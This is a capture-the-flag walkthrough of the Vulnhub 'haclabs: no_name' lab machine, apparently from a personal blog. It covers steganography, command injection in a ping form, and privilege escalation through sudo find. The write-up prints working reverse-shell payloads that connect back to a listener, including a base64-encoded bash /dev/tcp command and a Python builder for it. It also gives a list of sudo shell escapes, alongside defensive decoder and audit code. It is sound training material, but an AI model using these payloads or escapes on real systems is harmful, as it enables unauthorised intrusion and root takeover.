Vulnhub Haclabs No Name: detailed walkthrough


Target information

Name: haclabs: no_name

URL: https://www.vulnhub.com/entry/haclabs-no_name,429/

Identify the target's IP address

                                                                                                                                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:38:93:68      1      60  PCS Systemtechnik GmbH                                                                                                                                                                 
 192.168.56.164  08:00:27:c3:95:0d      1      60  PCS Systemtechnik GmbH        

netdiscover, which ships with Kali Linux, identifies the target as 192.168.56.164 (the other two hosts, .1 and .100, are the VirtualBox host-only adapter and its DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.164 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 20:12 EST
Nmap scan report for bogon (192.168.56.164)
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:C3:95:0D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds
                                                                        

The target exposes a single open TCP port: 80 (Apache httpd 2.4.29 on Ubuntu). With no SSH or other service listening, the web application is the only way in.

Get Access

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ curl http://192.168.56.164      
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ curl http://192.168.56.164/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.164 Port 80</address>
</body></html>

</html>

<!--passphrase:harder-->


The response contains an HTML comment with a passphrase: harder. A passphrase for what, though? Set it aside for now and enumerate the site's directories and files:

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/08 20:53:07 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 417]
/server-status        (Status: 403) [Size: 279]
Progress: 219282 / 220561 (99.42%)
===============================================================
2022/11/08 20:53:36 Finished
===============================================================
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ nikto -h http://192.168.56.164
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.164
+ Target Hostname:    192.168.56.164
+ Target Port:        80
+ Start Time:         2022-11-08 20:53:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-08 20:54:35 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,sh,txt,html
[+] Timeout:                 10s
===============================================================
2022/11/08 20:54:49 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 201]
/admin                (Status: 200) [Size: 417]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1099098 / 1102805 (99.66%)
===============================================================
2022/11/08 20:57:11 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ dirb http://192.168.56.164

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov  8 20:57:50 2022
URL_BASE: http://192.168.56.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.164/ ----
+ http://192.168.56.164/admin (CODE:200|SIZE:417)                                                                                                                                                                                          
+ http://192.168.56.164/index.php (CODE:200|SIZE:201)                                                                                                                                                                                      
+ http://192.168.56.164/server-status (CODE:403|SIZE:279)                                                                                                                                                                                  
                                                                                                                                                                                                                                           
-----------------
END_TIME: Tue Nov  8 20:57:51 2022
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ dirb http://192.168.56.164/admin

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov  8 20:57:57 2022
URL_BASE: http://192.168.56.164/admin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.164/admin/ ----
                                                                                                                                                                                                                                           
-----------------
END_TIME: Tue Nov  8 20:57:58 2022
DOWNLOADED: 4612 - FOUND: 0
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.164/admin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.164/admin
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sh,txt,html,php
[+] Timeout:                 10s
===============================================================
2022/11/08 20:58:15 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1101266 / 1102805 (99.86%)
===============================================================
2022/11/08 21:00:30 Finished
===============================================================

The /admin page embeds three images and nothing else enumerates beneath it, so the passphrase is most likely for data hidden in one of them. Download the images to Kali and try steghide with the passphrase harder: it extracts imp.txt from haclabs.jpeg, finds nothing in new.jpg, and rejects Short.png outright, since steghide only handles JPEG, BMP, WAV and AU cover files. The extracted text is base64 and decodes to a filename:

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ ls
haclabs.jpeg  new.jpg  nmap_full_scan  Short.png
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ steghide extract -sf haclabs.jpeg 
Enter passphrase: 
wrote extracted data to "imp.txt".
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ ls
haclabs.jpeg  imp.txt  new.jpg  nmap_full_scan  Short.png
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ cat imp.txt      
c3VwZXJhZG1pbi5waHA=
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ steghide extract -sf new.jpg     
Enter passphrase: 
steghide: could not extract any data with that passphrase!
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ steghide extract -sf Short.png 
Enter passphrase: 
steghide: the file format of the file "Short.png" is not supported.
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ echo "c3VwZXJhZG1pbi5waHA=" | base64 -d                                                                                                                                                                            
superadmin.php                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ 

Requesting that page from Kali shows a form that lets the administrator ping an IP address:

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ curl http://192.168.56.164/superadmin.php
<form method="post" action="">
<input type="text" placeholder="Enter an IP to ping" name="pinger">
<br>
<input type="submit" name="submitt">
</form>

Unlike the "fake query" box on the index page, this one really runs ping: submitting 127.0.0.1 returns normal ping output, so it is the obvious place to look for OS command injection. Probing the usual separators:

Trying 127.0.0.1;id produces no output at all.

Trying 127.0.0.1&&id also produces nothing.

Trying 127.0.0.1||id runs the ping, but id produces no output.

Trying an unreachable address, 2.2.2.2||id, does return the output of id.

The pattern explains itself. Inputs containing ; or && apparently get rejected by an input filter (if && were allowed, a successful ping would have been followed by id), while || gets through. But || only runs its right-hand side when the left-hand command exits non-zero, and ping to 127.0.0.1 exits 0, so id was never reached. Pointing the ping at a host that cannot answer makes it fail, and the injected command runs.

Next, try to turn this into a reverse shell.

2.2.2.2||which nc returns nothing: there is no nc on the target.

2.2.2.2||which python returns nothing either: no python binary, i.e. no Python 2.

2.2.2.2||which python3 returns /usr/bin/python3, so Python 3 is available.

A Python 3 reverse shell should therefore be possible; the payload tried was:

python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); v_ip="192.168.56.137"; s.connect((v_ip,5555)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); v_shell_path="/usr/bin/bash";v_shell_value="-i"; p=subprocess.call([v_shell_path,v_shell_value]);'

It fails, and so do many other reverse-shell one-liners.

Two things are worth checking before blaming everything on the filter. The one-liner above hard-codes /usr/bin/bash; Apache 2.4.29 is the build Ubuntu 18.04 ships, and 18.04 installs without a merged /usr, so that path may simply not exist (2.2.2.2||which bash is a cheap sanity check). More importantly, the one-liner contains several ; characters, which the separator tests above suggest the filter rejects.

Other write-ups take the route that sidesteps the filter entirely: base64-encode the shell command so the submitted input contains only base64 characters, spaces and the | that is already known to work, then decode and execute it on the target:

2.2.2.2||echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzNy81NTU1IDA+JjEK |base64 -d |bash

The blob decodes to bash -i >& /dev/tcp/192.168.56.137/5555 0>&1, with 192.168.56.137 being the Kali listener. Note the final pipe into bash: without it the payload merely prints the decoded reverse-shell command instead of executing it.
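The following is an added example, not code from the original write-up or from the VM. It models the behaviour observed on superadmin.php and builds the same base64-wrapped payload, then shows the defender's side: pulling the hidden command back out of a captured request or audit line. ASSUMED_BLOCKED is a hypothetical blacklist inferred only from the probes above (; and && produced nothing, || ran); the real filter was never read. REVERSE_SHELL and the listener address 192.168.56.137 are taken from the page; everything else (function names, the regex, the constructed inputs) is mine.

```python
"""
Build the filter-evading payload used against superadmin.php and, for the
defender, recover the hidden command from a captured request.

Added example; not code from the original write-up or from the VM.
ASSUMED_BLOCKED is a hypothetical blacklist inferred from the observed
behaviour (';' and '&&' produced nothing, '||' ran); the real filter was
never read, so treat it as a model only.
"""
import base64
import re
from typing import Optional

# Hypothetical: separators the page appeared to reject. Not read from the source.
ASSUMED_BLOCKED = frozenset(";&")

# Everything a base64 blob can contain. Disjoint from ASSUMED_BLOCKED, which is
# why the wrapper gets through where the raw command does not.
B64_ALPHABET = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)

# The reverse shell from the write-up. 192.168.56.137 is the Kali listener.
# The trailing newline is part of the encoded string on the page.
REVERSE_SHELL = "bash -i >& /dev/tcp/192.168.56.137/5555 0>&1\n"


def passes_filter(value: str) -> bool:
    """True when the submitted text contains none of the modelled blacklist."""
    return not any(ch in ASSUMED_BLOCKED for ch in value)


def build_payload(cmd: str, unreachable_ip: str = "2.2.2.2") -> str:
    """Wrap cmd for the 'pinger' field.

    The left-hand side is an unreachable host so ping exits non-zero and the
    shell's '||' runs the right-hand side. The command travels as base64, so
    '>', '&', ';' and quotes never appear in the submitted input; the only
    metacharacter left is '|', which the probes showed to be allowed.
    """
    blob = base64.b64encode(cmd.encode()).decode("ascii")
    if not set(blob) <= B64_ALPHABET:  # defensive; b64encode never violates this
        raise ValueError("unexpected character in base64 output")
    return f"{unreachable_ip}||echo {blob} | base64 -d | bash"


# Defender side: match 'echo <b64> | base64 -d | sh/bash' in a POST body,
# access log or process-audit line.
_B64_PIPE = re.compile(
    r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:/bin/)?(?:ba)?sh\b"
)


def decode_b64_pipeline(text: str) -> Optional[str]:
    """Return the command hidden inside a base64-decode-and-execute pipeline,
    or None when there is no such pipeline or the blob is not valid base64
    (validate=True rejects stray characters; bad length raises too)."""
    m = _B64_PIPE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


if __name__ == "__main__":
    payload = build_payload(REVERSE_SHELL)
    print("raw command blocked? ", not passes_filter(REVERSE_SHELL))
    print("payload blocked?     ", not passes_filter(payload))
    print("submit as pinger=    ", payload)
    print("decoded by defender: ", decode_b64_pipeline("pinger=" + payload))
```

build_payload(REVERSE_SHELL) reproduces the exact blob used on the page, which is a useful check that the encoded string really is the bash /dev/tcp one-liner and nothing else. The decoder is the mirror image for the blue team: a base64 blob piped into base64 -d and then into a shell is rarely legitimate in a web request, and decoding it turns an opaque POST body into the attacker's actual command.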

┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.164] 56930
bash: cannot set terminal process group (668): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/var/www/html$ 

Kali now has a shell on the target as www-data.

www-data@haclabs:/home$ ls
ls
haclabs
yash
www-data@haclabs:/home$ cd haclabs
cd haclabs
www-data@haclabs:/home/haclabs$ ls -alh
ls -alh
total 80K
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15  2020 .
drwxr-xr-x  4 root    root    4.0K Jan 27  2020 ..
-rw-------  1 haclabs haclabs 2.6K Jan 30  2020 .ICEauthority
-rw-r--r--  1 haclabs haclabs 3.7K Jan 27  2020 .bashrc
drwx------ 13 haclabs haclabs 4.0K Feb  9  2020 .cache
drwx------ 11 haclabs haclabs 4.0K Jan 27  2020 .config
drwx------  3 haclabs haclabs 4.0K Jan 27  2020 .gnupg
drwx------  3 haclabs haclabs 4.0K Jan 27  2020 .local
drwx------  5 haclabs haclabs 4.0K Jan 27  2020 .mozilla
-rw-r--r--  1 haclabs haclabs  807 Jan 27  2020 .profile
drwx------  2 haclabs haclabs 4.0K Jan 27  2020 .ssh
-rw-r--r--  1 haclabs haclabs    0 Jan 27  2020 .sudo_as_admin_successful
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Desktop
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Documents
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Downloads
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Music
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Pictures
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Public
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Templates
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Videos
-rw-r--r--  1 root    root     152 Jan 30  2020 flag2.txt
www-data@haclabs:/home/haclabs$ cat flag2.txt
cat flag2.txt
I am flag2 

           ---------------               ----------------
                         
                     
                               --------
www-data@haclabs:/home/haclabs$ cd ..
cd ..
www-data@haclabs:/home$ ls
ls
haclabs
yash
www-data@haclabs:/home$ cd yash
cd yash
www-data@haclabs:/home/yash$ ls -alh
ls -alh
total 36K
drwxr-xr-x 5 yash yash 4.0K Feb 15  2020 .
drwxr-xr-x 4 root root 4.0K Jan 27  2020 ..
-rw------- 1 yash yash   13 Feb 15  2020 .bash_history
-rw-r--r-- 1 yash yash 3.7K Jan 27  2020 .bashrc
drwx------ 2 yash yash 4.0K Feb  9  2020 .cache
drwx------ 3 yash yash 4.0K Jan 27  2020 .gnupg
drwxrwxr-x 3 yash yash 4.0K Jan 27  2020 .local
-rw-r--r-- 1 yash yash  807 Jan 27  2020 .profile
-rw-rw-r-- 1 yash yash   77 Jan 30  2020 flag1.txt
www-data@haclabs:/home/yash$ cat flag1.txt
cat flag1.txt
Due to some security issues,I have saved haclabs password in a hidden file.

www-data@haclabs:/home/yash$ cat .bash_history
cat .bash_history
cat: .bash_history: Permission denied
www-data@haclabs:/home/yash$ cd ..
cd ..
www-data@haclabs:/home$ ls
ls
haclabs
yash
www-data@haclabs:/home$ cd haclabs
cd haclabs
www-data@haclabs:/home/haclabs$ ls -alh
ls -alh
total 80K
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15  2020 .
drwxr-xr-x  4 root    root    4.0K Jan 27  2020 ..
-rw-------  1 haclabs haclabs 2.6K Jan 30  2020 .ICEauthority
-rw-r--r--  1 haclabs haclabs 3.7K Jan 27  2020 .bashrc
drwx------ 13 haclabs haclabs 4.0K Feb  9  2020 .cache
drwx------ 11 haclabs haclabs 4.0K Jan 27  2020 .config
drwx------  3 haclabs haclabs 4.0K Jan 27  2020 .gnupg
drwx------  3 haclabs haclabs 4.0K Jan 27  2020 .local
drwx------  5 haclabs haclabs 4.0K Jan 27  2020 .mozilla
-rw-r--r--  1 haclabs haclabs  807 Jan 27  2020 .profile
drwx------  2 haclabs haclabs 4.0K Jan 27  2020 .ssh
-rw-r--r--  1 haclabs haclabs    0 Jan 27  2020 .sudo_as_admin_successful
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Desktop
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Documents
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Downloads
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Music
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Pictures
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Public
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Templates
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 Videos
-rw-r--r--  1 root    root     152 Jan 30  2020 flag2.txt
www-data@haclabs:/home/haclabs$ cd .config
cd .config
bash: cd: .config: Permission denied
www-data@haclabs:/home/haclabs$ cd Desktop
cd Desktop
www-data@haclabs:/home/haclabs/Desktop$ ls -alh
ls -alh
total 8.0K
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 .
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15  2020 ..
www-data@haclabs:/home/haclabs/Desktop$ cd ..
cd ..
www-data@haclabs:/home/haclabs$ cd Documents
cd Documents
www-data@haclabs:/home/haclabs/Documents$ ls -alh
ls -alh
total 8.0K
drwxr-xr-x  2 haclabs haclabs 4.0K Jan 27  2020 .
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15  2020 ..
www-data@haclabs:/home/haclabs/Documents$ cd ..
cd ..
www-data@haclabs:/home/haclabs$ cat .ICEauthority
cat .ICEauthority
cat: .ICEauthority: Permission denied
www-data@haclabs:/home/haclabs$ 

flag1.txt in yash's home directory says the author saved haclabs' password in a hidden file.

Since yash wrote that file, list every regular file owned by yash; the one outside /home/yash is the hidden password file. Note that su refuses to run without a controlling terminal ("must be run from a terminal"), so the shell has to be upgraded to a pty with python3 before switching to haclabs:

www-data@haclabs:/home/haclabs$ find / -type f -user yash 2>/dev/null
find / -type f -user yash 2>/dev/null
/home/yash/flag1.txt
/home/yash/.bashrc
/home/yash/.cache/motd.legal-displayed
/home/yash/.profile
/home/yash/.bash_history
/usr/share/hidden/.passwd
www-data@haclabs:/home/haclabs$ cat /usr/share/hidden/.passwd
cat /usr/share/hidden/.passwd
haclabs1234
www-data@haclabs:/home/haclabs$ su - haclabs
su - haclabs
su: must be run from a terminal
www-data@haclabs:/home/haclabs$ bash -i
bash -i
bash: cannot set terminal process group (668): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/home/haclabs$ su - haclabs
su - haclabs
su: must be run from a terminal
www-data@haclabs:/home/haclabs$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<abs$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@haclabs:/home/haclabs$ su -haclabs
su -haclabs
Usage: su [options] [LOGIN]

Options:
  -c, --command COMMAND         pass COMMAND to the invoked shell
  -h, --help                    display this help message and exit
  -, -l, --login                make the shell a login shell
  -m, -p,
  --preserve-environment        do not reset environment variables, and
                                keep the same shell
  -s, --shell SHELL             use SHELL instead of the default in passwd

www-data@haclabs:/home/haclabs$ su haclabs
su haclabs
Password: haclabs1234

haclabs@haclabs:~$ id
id
uid=1000(haclabs) gid=1000(haclabs) groups=1000(haclabs),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
haclabs@haclabs:~$ sudo -l
sudo -l
Matching Defaults entries for haclabs on haclabs:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User haclabs may run the following commands on haclabs:
    (root) NOPASSWD: /usr/bin/find
haclabs@haclabs:~$ sudo find . -exec /bin/sh \; -quit
sudo find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
flag3.txt
# cat flag3.txt
cat flag3.txt
Congrats!!!You completed the challenege!



                                                   ()    ()

                                                 \          /
                                                  ----------
# 

Root flag obtained. The final step relies on one sudoers line: haclabs may run /usr/bin/find as root with no password, and find's -exec runs whatever command it is given, so a single find invocation drops straight into a root shell and /root/flag3.txt is readable.
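As an added example (not code from the original write-up), the check a defender or auditor would run to catch this kind of sudoers entry before an attacker does: parse the output of sudo -l and flag binaries known to hand out a shell. SAMPLE_SUDO_L is the output captured on the VM above; KNOWN_ESCAPES is a small subset of the well-known sudo escapes, the full GTFOBins list being far longer, and the function names and the extra sample entries in the usage are mine.

```python
"""
Audit 'sudo -l' output for binaries that hand out a shell as root, the
misconfiguration that ends this box (NOPASSWD find).

Added example; not code from the original write-up. SAMPLE_SUDO_L is the
output captured on the VM; KNOWN_ESCAPES is a small subset of the well-known
sudo escapes (the GTFOBins list is far longer).
"""
import os
import re
from typing import Dict, List

# Verbatim 'sudo -l' output from the haclabs shell in the write-up.
SAMPLE_SUDO_L = r"""Matching Defaults entries for haclabs on haclabs:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User haclabs may run the following commands on haclabs:
    (root) NOPASSWD: /usr/bin/find
"""

# Binary -> one working escape. find is the one used on this box.
KNOWN_ESCAPES = {
    "find": r"sudo find . -exec /bin/sh \; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type !/bin/sh at the prompt)",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "env": "sudo env /bin/sh",
}

# One sudoers entry as printed by 'sudo -l':  (runas) [TAG: ...] cmd[, cmd...]
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Return one record per command the user may run; Defaults lines are skipped."""
    entries: List[Dict[str, object]] = []
    in_commands = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append(
                    {
                        "runas": m.group("runas").strip(),
                        "nopasswd": "NOPASSWD:" in tags,
                        "command": cmd,
                    }
                )
    return entries


def find_escapes(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag entries whose binary is a known shell escape (or ALL, which needs none)."""
    hits = []
    for e in entries:
        cmd = str(e["command"])
        if cmd == "ALL":
            hits.append({**e, "binary": "ALL", "escape": "sudo /bin/sh"})
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in KNOWN_ESCAPES:
            hits.append({**e, "binary": binary, "escape": KNOWN_ESCAPES[binary]})
    return hits


if __name__ == "__main__":
    for hit in find_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        pw = "NOPASSWD" if hit["nopasswd"] else "password required"
        print(f"{hit['command']} as ({hit['runas']}), {pw}: {hit['escape']}")
```

Run against the page's output it reports exactly one hit, /usr/bin/find as root with NOPASSWD, together with the same -exec /bin/sh escape used above. The parser also handles comma-separated command lists and the (ALL : ALL) ALL form, so it can be pointed at sudo -l output from any host rather than this one VM.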

posted @ 2022-11-09 10:54  Jason_huawen